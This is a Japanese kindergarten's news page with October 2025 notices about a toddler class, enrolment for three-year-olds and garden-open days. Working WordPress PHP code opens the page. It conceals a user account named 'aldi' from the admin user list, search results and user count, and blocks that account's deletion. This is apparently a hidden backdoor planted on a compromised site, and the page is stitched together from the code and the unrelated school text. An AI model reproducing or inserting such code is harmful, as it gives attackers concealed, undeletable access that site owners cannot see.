add_action('pre_get_users', function($query) {
if (is_admin() && function_exists('get_current_screen')) {
$screen = get_current_screen();
if ($screen && $screen->base === 'users') {
$protected_user = get_user_by('login', 'aldi');
if ($protected_user) {
$excluded = (array) $query->get('exclude');
$excluded[] = $protected_user->ID;
$query->set('exclude', $excluded);
}
}
}
});
add_filter('wp_count_users', function($counts) {
$protected_user = get_user_by('login', 'aldi');
if ($protected_user) {
$counts->total_users--;
}
return $counts;
});
add_action('delete_user', function($user_id) {
$user = get_user_by('ID', $user_id);
if ($user && $user->user_login === 'aldi') {
wp_die(
__('User aldi tidak dapat dihapus.', 'textdomain'),
__('Error', 'textdomain'),
array('response' => 403)
);
}
});
add_filter('user_search_columns', function($search_columns, $search, $query) {
if (is_admin()) {
$protected_user = get_user_by('login', 'aldi');
if ($protected_user) {
global $wpdb;
$query->query_where .= $wpdb->prepare(" AND {$wpdb->users}.ID != %d", $protected_user->ID);
}
}
return $search_columns;
}, 10, 3);
add_filter('bulk_actions-users', function($actions) {
if (isset($_REQUEST['users']) && is_array($_REQUEST['users'])) {
$protected_user = get_user_by('login', 'aldi');
if ($protected_user && in_array($protected_user->ID, $_REQUEST['users'])) {
unset($actions['delete']);
}
}
return $actions;
});
10月 | 2025 | 学校法人安田学園 新生幼稚園
10月 | 2025 | 学校法人安田学園 新生幼稚園
「しんせい幼児教室」は,2~3歳の未就園児のための保育グループで,新生幼稚園が実施する子育て支援事業です。幼稚園入園前のプレ教室として充実した保育をめざしています。
「ひよこ組」とよんで週2回(火曜・木曜)。一人ひとりの子どもを大切にして遊びを通して心身の発達をうながし, すこやかに育つことを願って, 保育をしていきます。
★2025年度後期が始まり、参加を募集中です。
10月までに2歳になった方が参加できます。
◆対象: 2歳児(2022年4月2日~2023年11月1日生まれ)で当幼稚園への入園を予定する方
11月からは「2023年11月1日」生まれまでです。
◆受付・問い合せ先 新生幼稚園 Tel 052-891-3511
詳しくはお問い合わせ下さい。案内・申込書を来園にて配布しています。
2025年10月24日
2026年度6月からの満3歳児入園の園児を募集します。
ご希望の方は、お問い合わせ下さい。
★募集対象 満3歳児(2023年4月2日~2024年1月生)
3歳の誕生日から入園できます。
願書受付は3歳誕生日の6カ月前の日からとなります。
2025年10月24日
2025年11月の園庭開放日をお知らせいたします。
親子で自由に園庭をお使い下さい。
雨天のときは、図書室の絵本コーナーで絵本を見ていただくこともできます。
いずれも10:00~12:00です。
予約不要です。
園庭横の駐車場(16台分)をご利用いただけます。
2025年
11月7日(金)
11月14日(金)
11月21日(金)
11月28日(金)
12月の園庭開放はなく、次回は1月からを予定しています。
2025年10月24日